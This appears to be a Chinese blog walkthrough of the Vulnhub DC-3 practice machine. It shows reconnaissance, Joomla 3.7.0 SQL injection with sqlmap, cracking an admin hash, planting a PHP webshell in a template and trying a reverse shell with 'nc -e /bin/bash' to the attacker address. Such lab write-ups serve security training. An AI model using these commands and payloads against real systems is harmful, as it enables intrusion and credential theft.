Vulnhub靶场DC-3

本机192.168.223.128
靶机192.168.223.139
目标发现nmap -sP 192.168.223.0/24

Vulnhub靶场DC-3_第1张图片

端口扫描nmap -p- 192.168.223.139
Vulnhub靶场DC-3_第2张图片

之开启了一个80端口
看一下是什么服务

nmap -sV -p- -A 192.168.223.139

Vulnhub靶场DC-3_第3张图片

是一个apache服务,joomla模板
看一下web
Vulnhub靶场DC-3_第4张图片

没什么有用信息。
扫描一下后台

dirsearch -u http://192.168.223.139/

Vulnhub靶场DC-3_第5张图片

有个administator可能是后台界面
看一下
Vulnhub靶场DC-3_第6张图片

joomla这个cms有个专门漏扫工具
joomscan --help

Vulnhub靶场DC-3_第7张图片
扫一下
Vulnhub靶场DC-3_第8张图片

没扫出来什么有用的信息
比较重要的就是这个版本3.7.0,搜一下看看有没有漏洞
Vulnhub靶场DC-3_第9张图片

看一下这个php文件
把里面的url改成目标机ip
Vulnhub靶场DC-3_第10张图片

不太管用,换个txt文件看看怎么个回事
在这里插入图片描述

看看这42033.txt,版本号完全一致
Vulnhub靶场DC-3_第11张图片

给了sqlmap的指令,把其中的url改一下

sqlmap -u "http://192.168.223.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

Vulnhub靶场DC-3_第12张图片

爆出库名了
看一下当前库名
在这里插入图片描述

当前是joomladb
看一下表明

sqlmap -u "http://192.168.223.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --tables -D joomladb -p list[fullordering]

Vulnhub靶场DC-3_第13张图片

巨长的表,一般看users

sqlmap -u "http://192.168.223.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -T "#__users" -D joomladb -p list[fullordering] --columns

注意给表名加上双引号不然会被当成注释
在这里插入图片描述

这里字典就使用1
Vulnhub靶场DC-3_第14张图片

有账号密码

sqlmap -u "http://192.168.223.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dump -C username,password -T "#__users" -D joomladb -p list[fullordering]

Vulnhub靶场DC-3_第15张图片

admin $2y 10 10 10DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
john爆破一下密码
Vulnhub靶场DC-3_第16张图片

密码是snoopy
Vulnhub靶场DC-3_第17张图片

登上了
Vulnhub靶场DC-3_第18张图片

这里可以文件读取也可以文件上传
发现有个php文件,修改成一句话
Vulnhub靶场DC-3_第19张图片

注意目录是/templates/beez3/html/modules.php
成功rce
现在可以反弹shell
攻击机开个监听端口 nc -lvnp 4567
x=system(“nc -e /bin/bash 192.168.223.128 4567”);
发现弹不过来,不知道什么问题。。。(后来发现是靶机的nc 没有-e功能)
Vulnhub靶场DC-3_第20张图片

换个方法,用kali自带的传马工具weevely
先生成在一个马
weevely generate x /tmp/shell.php
把里面的内容复制到刚才那个modules.php里面


然后连接 weevely http://192.168.223.139/templates/beez3/html/modules.php x

Vulnhub靶场DC-3_第21张图片

成功弹回shell

翻了一圈没找到可以利用的文件,看了别人的wp发现是Ubuntu这个版本有漏洞
lsb_release -a看一下自己的Ubuntu版本
Vulnhub靶场DC-3_第22张图片

搜一下版本漏洞
Vulnhub靶场DC-3_第23张图片

看其他人使用这个漏洞,看一下
在这里插入图片描述

下载一下exp

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip 

Vulnhub靶场DC-3_第24张图片

最后老失败,不知道为什么,晕,基本完成了…

你可能感兴趣的:(vulnhub靶场,网络安全,靶场,vulnhub,渗透测试)